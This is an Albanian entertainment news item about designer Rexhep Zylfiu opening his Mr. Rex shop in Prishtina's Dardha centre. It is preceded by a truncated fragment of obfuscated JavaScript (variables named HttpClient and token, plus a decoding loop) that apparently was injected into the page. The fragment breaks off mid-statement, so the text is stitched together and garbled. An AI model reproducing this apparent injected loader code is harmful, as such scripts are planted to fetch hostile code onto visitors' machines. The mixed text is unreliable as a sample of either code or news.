;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mr. Rex tash e tutje me dyqan në Prishtinë

By

Në fushën e modës, Rexhep Zylfiu përbën një emër relativisht të ri.

Megjithatë, brenda një kohe mjaft të shkurtër, Rexhepi ka arritur depërtimin në terrene jo të lehta duke u shndërruar në një emër të njohur.

Me idetë novative të koleksioneve për femra, meshkuj por edhe fëmijë Mr. Rex u bë edhe dizajneri i besuar nga shumë fytyra publike.

E ky sukses pa dyshim se nuk kishte se si të shoqërohej edhe pa posedimin e një lokali.

Brendi Mr. Rex mbrëmë është kompletuar edhe në këtë aspekt duke hapur lokalin në qendrën tregtare ‘Dardha’ në Prishtinë.

Në një ceremoni ku të pranishëm ishin edhe emra të skenës si Blero, Rovena Stefa, SoulKid e Gjiko, Rexhepi festoi edhe një tjetër sukses në karrierë.

Duke i lënë rradhën punës, mbetet të shohim modele të reja veshjesh nga dizajneri Zylfiu. /PRIVE.AL/

Artikuj të ngjashëm